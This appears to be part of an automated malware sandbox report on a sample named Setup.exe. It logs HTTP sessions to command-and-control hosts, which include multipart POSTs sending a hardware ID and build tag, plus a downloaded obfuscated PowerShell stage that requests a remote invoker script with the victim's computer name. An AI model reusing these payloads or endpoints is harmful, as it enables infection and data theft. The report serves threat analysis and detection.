                                                                                                              2025-01-05 17:58:16 UTC12797OUTData Raw: 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f
                                                                                                              Data Ascii: --EH35OOWNHHMNContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--EH35OOWNHHMNContent-Disposition: form-data; name="pid"2--EH35OOWNHHMNContent-Disposition: form-data; name="lid"hRjzG3--GAS--EH35OOWNHHMNCo
                                                                                                              2025-01-05 17:58:16 UTC1128INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:16 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=u0glb3pvgsk8rno7ouatub7vsi; expires=Thu, 01 May 2025 11:44:55 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tAeYULrabjJzb9KQu0cftvhokFExyCCVN4LGYTWUVWhG4AoXOZf7hlmvzSwGtAJQXQAGuWynTXzFvyZCMq21QSb2DlOF8BvbHz3vuu9BHPV5lWvn7YxZLRAKVw2gTHlaQ8B%2B0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b00acaf440d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1697&rtt_var=649&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13732&delivery_rate=1670480&cwnd=178&unsent_bytes=0&cid=ae9caa12f097468d&ts=560&x=0"
                                                                                                              2025-01-05 17:58:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.549724104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:17 UTC284OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=J2C6QZYMBGK69XZRAJU
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15081
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:17 UTC15081OUTData Raw: 2d 2d 4a 32 43 36 51 5a 59 4d 42 47 4b 36 39 58 5a 52 41 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 4a 32 43 36 51 5a 59 4d 42 47 4b 36 39 58 5a 52 41 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 32 43 36 51 5a 59 4d 42 47 4b 36 39 58 5a 52 41 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41
                                                                                                              Data Ascii: --J2C6QZYMBGK69XZRAJUContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--J2C6QZYMBGK69XZRAJUContent-Disposition: form-data; name="pid"2--J2C6QZYMBGK69XZRAJUContent-Disposition: form-data; name="lid"hRjzG3--GA
                                                                                                              2025-01-05 17:58:18 UTC1130INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:17 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=9mo9qi0nubodurru2ahkl45b8b; expires=Thu, 01 May 2025 11:44:56 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMMxMmSHj3dmv9rp8TmPtJ7rbrg4AzRs7pELPwht8ZQu7UG%2FIqSZBWtkMbPLKj%2BwXrUnHdDexLWWJ0zZlEjR7XFpVrLk6zU4WlrujiPU7qkCM5t5zEX0TuN6wncVzhfUVqgfvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b07c8e9de95-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1646&rtt_var=660&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2841&recv_bytes=16023&delivery_rate=1773997&cwnd=242&unsent_bytes=0&cid=2b14e8ecd22b9a61&ts=539&x=0"
                                                                                                              2025-01-05 17:58:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.549725104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:18 UTC274OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=QH87QAR8H
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20511
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:18 UTC15331OUTData Raw: 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                              Data Ascii: --QH87QAR8HContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--QH87QAR8HContent-Disposition: form-data; name="pid"3--QH87QAR8HContent-Disposition: form-data; name="lid"hRjzG3--GAS--QH87QAR8HContent-Dispos
                                                                                                              2025-01-05 17:58:18 UTC5180OUTData Raw: 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75
                                                                                                              Data Ascii: un 4F([:7s~X`nO`i`u
                                                                                                              2025-01-05 17:58:19 UTC1133INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:19 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=sinvcq8bpn34s8jhscvtmasvon; expires=Thu, 01 May 2025 11:44:58 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dBaKFWcg2tIQzhbL7gv8VVoOrqsU%2FkudwJqHUqHvrEbCoV40dXnwladvblzcbfuMzDo8wEclNSF1HUEhVYqayjk0tZ9hAj453geKA%2B6C%2FPpOBg4YTAXLQAroiYeQhoq80M8zbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b0f2837de95-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1642&rtt_var=619&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21465&delivery_rate=1778319&cwnd=242&unsent_bytes=0&cid=0c133cdf3713dc4a&ts=855&x=0"
                                                                                                              2025-01-05 17:58:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.549728104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:20 UTC281OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=V39DKRJ9WNME5J8KZ2
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 976
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:20 UTC976OUTData Raw: 2d 2d 56 33 39 44 4b 52 4a 39 57 4e 4d 45 35 4a 38 4b 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 56 33 39 44 4b 52 4a 39 57 4e 4d 45 35 4a 38 4b 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 33 39 44 4b 52 4a 39 57 4e 4d 45 35 4a 38 4b 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a
                                                                                                              Data Ascii: --V39DKRJ9WNME5J8KZ2Content-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--V39DKRJ9WNME5J8KZ2Content-Disposition: form-data; name="pid"1--V39DKRJ9WNME5J8KZ2Content-Disposition: form-data; name="lid"hRjzG3--GAS
                                                                                                              2025-01-05 17:58:20 UTC1134INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:20 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=jrsijcd96stsjtfjafesc0s98q; expires=Thu, 01 May 2025 11:44:59 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b1DbQS%2FRIk0%2BlcNgRKD%2FgIRAVn2dNfapQsMLFGb4nmnk69nRkkePerVf%2FFpGkjgbKOulPcVWzDwLhnZr3jrWLvP6C%2BtQpoaKjTXfxR6XkBiQ1WopvznBVy2hkyJkQG3r8Kqjrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b19baa8de95-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1650&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1893&delivery_rate=1769696&cwnd=242&unsent_bytes=0&cid=fc3c318a95a03ffd&ts=466&x=0"
                                                                                                              2025-01-05 17:58:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.549731104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:22 UTC278OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=DCMRVADM4YO11P
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1074
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:22 UTC1074OUTData Raw: 2d 2d 44 43 4d 52 56 41 44 4d 34 59 4f 31 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 44 43 4d 52 56 41 44 4d 34 59 4f 31 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 43 4d 52 56 41 44 4d 34 59 4f 31 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 44 43 4d 52 56 41 44 4d 34 59
                                                                                                              Data Ascii: --DCMRVADM4YO11PContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--DCMRVADM4YO11PContent-Disposition: form-data; name="pid"1--DCMRVADM4YO11PContent-Disposition: form-data; name="lid"hRjzG3--GAS--DCMRVADM4Y
                                                                                                              2025-01-05 17:58:22 UTC1130INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:22 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=v5nblfh0i4acvi21ckunfeua27; expires=Thu, 01 May 2025 11:45:01 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uWZDaMy7YYtmr8o%2BUb84vf1N8fTfqXgY5FybYvLGBXZCO%2BP9sLLrm72jX5Oog4%2BlzGbwkgbr4AZ9cAux4VyPAEQAvyxqRryA6k1ZpgCQtqpSHcXYpprzESBYpefrZMs7FukSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b250f968ca1-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1950&rtt_var=752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1988&delivery_rate=1436301&cwnd=168&unsent_bytes=0&cid=a89a5801681e3f82&ts=538&x=0"
                                                                                                              2025-01-05 17:58:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.549742104.21.64.14436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:23 UTC266OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 112
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:23 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31
                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=C99EB9646F84611709E39FEBDE2EA801
                                                                                                              2025-01-05 17:58:23 UTC1136INHTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:23 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=efoqmi2gmrc3gsl2i70ko8duru; expires=Thu, 01 May 2025 11:45:02 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IR2qkBeLD%2BSC0QLXIx%2F4Db9%2B%2FPzEET%2BZPNrUZ%2Bc7NplA7ouAQEweyJctsFP6wCcztSyDpfkal9Cz1WERvkZel2xHRBPs3QZzqEZ8GVSRGnk7iKaLnuL6K8eRlpym6mPiQh3Rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b2b582f7c6a-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=747&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1014&delivery_rate=1466599&cwnd=218&unsent_bytes=0&cid=8d85cdac02928fbc&ts=437&x=0"
                                                                                                              2025-01-05 17:58:23 UTC218INData Raw: 64 34 0d 0a 2f 63 4e 67 64 4c 66 61 6f 38 69 4d 4a 67 69 47 57 57 71 4a 77 62 58 76 62 41 5a 33 6d 6a 38 37 41 4a 44 4f 34 4d 35 32 49 36 43 6d 75 45 49 42 6c 65 43 42 6f 50 68 53 65 50 56 6a 4e 71 61 64 6d 6f 77 4a 59 51 4b 30 54 46 4e 76 34 4a 4c 50 39 6b 4d 55 6c 4d 2f 31 55 6b 43 44 37 50 2f 6e 2f 45 34 6d 38 69 45 65 71 2b 32 58 69 52 67 6b 54 61 67 54 47 57 57 79 39 4e 47 7a 57 6c 69 43 69 4f 46 61 56 74 2b 75 31 37 6a 2f 48 46 53 70 42 55 58 69 72 64 79 66 47 6e 4d 61 38 30 78 4f 61 62 36 39 69 4b 45 47 66 34 2b 55 72 52 51 72 31 4c 62 54 6c 2f 39 4f 61 61 67 74 45 76 33 6a 6d 63 30 4b 63 6c 57 67 44 78 63 69 39 65 7a 61 2f 67 74 2b 0d 0a
                                                                                                              Data Ascii: d4/cNgdLfao8iMJgiGWWqJwbXvbAZ3mj87AJDO4M52I6CmuEIBleCBoPhSePVjNqadmowJYQK0TFNv4JLP9kMUlM/1UkCD7P/n/E4m8iEeq+2XiRgkTagTGWWy9NGzWliCiOFaVt+u17j/HFSpBUXirdyfGnMa80xOab69iKEGf4+UrRQr1LbTl/9OaagtEv3jmc0KclWgDxci9eza/gt+
                                                                                                              2025-01-05 17:58:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.549748185.161.251.214436576C:\Users\user\Desktop\Setup.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-05 17:58:24 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Host: cegu.shop
                                                                                                              2025-01-05 17:58:24 UTC249INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.26.2
                                                                                                              Date: Sun, 05 Jan 2025 17:58:24 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Content-Length: 329
                                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                              Connection: close
                                                                                                              ETag: "676c9e2a-149"
                                                                                                              Accept-Ranges: bytes
                                                                                                              2025-01-05 17:58:24 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                              Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:12:58:01
                                                                                                              Start date:05/01/2025
                                                                                                              Path:C:\Users\user\Desktop\Setup.exe
